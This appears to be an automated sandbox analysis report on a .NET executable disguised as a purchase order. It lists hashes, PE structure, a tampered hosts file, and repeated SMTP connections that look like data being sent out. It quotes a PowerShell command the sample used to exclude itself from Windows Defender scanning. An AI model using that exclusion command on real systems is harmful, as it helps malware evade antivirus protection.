                                                SHA1:BA02D7F433434035A407C6F404849D25C7F25408
                                                SHA-256:5EA7582B7E73D2F59CAF50E0254BC1D20B3D3F228D35FBEBAC6CB118D3E513FA
                                                SHA-512:94821D2FDE5A93181462F32EA12BAA61320817963E94315F7ED847D98F0E2F2A8936DE78248C4361CB7D090524CEBAB8A39701B40B9483EAAD7E3BC460244F15
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220514113644..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 035347 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NpPgfycY.exe..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220514113644..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NpPgfycY.exe..**********************..Windows PowerShell transcript start..Start time: 20220514113944..Username: computer\user..RunAs User: computer\user..C

                                                C:\Windows\System32\drivers\etc\hosts

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):835
                                                Entropy (8bit):4.694294591169137
                                                Encrypted:false
                                                SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                MD5:6EB47C1CF858E25486E42440074917F2
                                                SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.7510737607081515
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Purchase order 450080088 proj. Allt Charnan.exe
                                                File size:677888
                                                MD5:152ef22896bf39197d210d40171e898a
                                                SHA1:bdd88e03d9131d7f35e0bfadbed02010d231a1bd
                                                SHA256:5a3834895f08aff701a029275074d4ab47aff4951d6f75e8393b0a97cb8f6031
                                                SHA512:b4648e8c09c4958d80c9f08801d9bd9e3e2651dd194a71db30d9ba1c84ee448823f97c1550fbd476863046398cae26e533aa504e7bb297dd53287f52a0d4c928
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                TLSH:67E4F13DF1F79E22C35D26B2C0C65A0443B44AAAA637E35B2B4581D59D03BF789887C7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4a6ece
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x627E0356 [Fri May 13 07:05:58 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa6e800x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x394.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa6e2a0x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xa4ed40xa5000False0.873976089015data7.75961172037IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rsrc0xa80000x3940x400False0.3779296875data2.89820511278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xaa0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xa80580x33cdata

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Version Infos

                                                DescriptionData
                                                Translation0x0000 0x04b0
                                                LegalCopyrightCopyright 2017
                                                Assembly Version1.0.0.0
                                                InternalNameSZArrayEnumera.exe
                                                FileVersion1.0.0.0
                                                CompanyName
                                                LegalTrademarks
                                                Comments
                                                ProductNameResetEvent
                                                ProductVersion1.0.0.0
                                                FileDescriptionResetEvent
                                                OriginalFilenameSZArrayEnumera.exe

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 14, 2022 11:37:05.771193981 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:05.993397951 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:05.995455027 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:07.157839060 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:07.158174992 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:09.159976006 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:09.160301924 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:10.559385061 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:10.559766054 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:10.781893969 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:10.782027960 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:10.783271074 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.317747116 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:11.317868948 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.405200958 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.628443956 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:11.628912926 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.853620052 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:11.854393959 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.079016924 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:12.079271078 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.321695089 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:12.327233076 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.809250116 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.857587099 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:12.858903885 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:13.606168985 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:15.215701103 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:15.439024925 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:15.439127922 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:15.872628927 CEST49752587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:16.545691013 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:16.545902014 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:17.689683914 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:17.690489054 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:18.919081926 CEST49752587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:24.919596910 CEST49752587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:36.930541992 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:39.920793056 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:40.141374111 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:40.141472101 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:40.828701973 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:40.828891039 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:41.049647093 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.049762011 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.049993992 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:41.271897078 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.272609949 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:41.496193886 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.496411085 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.029009104 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:42.029138088 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.108721972 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.718844891 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.941464901 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:42.941850901 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:43.174514055 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:43.174971104 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:43.396542072 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:43.396626949 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:38:17.319211006 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:17.541548014 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:17.541661978 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:17.770459890 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:17.770930052 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:18.305701971 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:18.308371067 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:18.424050093 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:19.221009970 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:19.443434954 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:19.443476915 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:19.443802118 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:20.649733067 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:20.649828911 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:22.111876011 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.252902985 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.453726053 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:27.455028057 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.657000065 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:27.657284021 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.858243942 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:27.858702898 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:28.080161095 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:28.081532001 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:28.281615973 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:28.281754971 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:31.937253952 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.137037992 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.137238026 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.531996012 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.535051107 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.734637022 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.734733105 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.735054970 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.935878038 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.936386108 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.138474941 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:33.191013098 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.435726881 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.637151957 CEST58749837208.91.198.38192.168.2.3

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 14, 2022 11:37:05.487682104 CEST5742153192.168.2.38.8.8.8
                                                May 14, 2022 11:37:05.688388109 CEST53574218.8.8.8192.168.2.3
                                                May 14, 2022 11:37:05.738382101 CEST6535853192.168.2.38.8.8.8
                                                May 14, 2022 11:37:05.757062912 CEST53653588.8.8.8192.168.2.3
                                                May 14, 2022 11:37:14.516261101 CEST5380253192.168.2.38.8.8.8
                                                May 14, 2022 11:37:15.395394087 CEST53538028.8.8.8192.168.2.3
                                                May 14, 2022 11:37:15.838098049 CEST6526653192.168.2.38.8.8.8
                                                May 14, 2022 11:37:15.871031046 CEST53652668.8.8.8192.168.2.3
                                                May 14, 2022 11:38:16.653938055 CEST5242753192.168.2.38.8.8.8
                                                May 14, 2022 11:38:16.672384024 CEST53524278.8.8.8192.168.2.3
                                                May 14, 2022 11:38:16.733551025 CEST6272453192.168.2.38.8.8.8
                                                May 14, 2022 11:38:17.050725937 CEST53627248.8.8.8192.168.2.3
                                                May 14, 2022 11:38:30.725126028 CEST6494153192.168.2.38.8.8.8
                                                May 14, 2022 11:38:30.743849039 CEST53649418.8.8.8192.168.2.3
                                                May 14, 2022 11:38:31.564668894 CEST5540353192.168.2.38.8.8.8
                                                May 14, 2022 11:38:31.583493948 CEST53554038.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.546118975 CEST5496053192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.562371969 CEST53549608.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.564305067 CEST6187753192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.579952955 CEST53618778.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.750690937 CEST6462453192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.769515038 CEST53646248.8.8.8192.168.2.3
                                                May 14, 2022 11:38:35.771682024 CEST6441253192.168.2.38.8.8.8
                                                May 14, 2022 11:38:35.789570093 CEST53644128.8.8.8192.168.2.3

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                May 14, 2022 11:37:05.487682104 CEST192.168.2.38.8.8.80x8403Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.738382101 CEST192.168.2.38.8.8.80x6b7fStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:37:14.516261101 CEST192.168.2.38.8.8.80x1f6cStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.838098049 CEST192.168.2.38.8.8.80x4812Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.653938055 CEST192.168.2.38.8.8.80x68c4Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.733551025 CEST192.168.2.38.8.8.80x1399Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.725126028 CEST192.168.2.38.8.8.80x442eStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.564668894 CEST192.168.2.38.8.8.80x8729Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.546118975 CEST192.168.2.38.8.8.80xea2Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.564305067 CEST192.168.2.38.8.8.80xf929Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.750690937 CEST192.168.2.38.8.8.80x114dStandard query (0)smtp.transmase.comA (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.771682024 CEST192.168.2.38.8.8.80x9bf3Standard query (0)smtp.transmase.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.688388109 CEST8.8.8.8192.168.2.30x8403No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:05.757062912 CEST8.8.8.8192.168.2.30x6b7fNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.395394087 CEST8.8.8.8192.168.2.30x1f6cNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:37:15.871031046 CEST8.8.8.8192.168.2.30x4812No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:16.672384024 CEST8.8.8.8192.168.2.30x68c4No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:17.050725937 CEST8.8.8.8192.168.2.30x1399No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
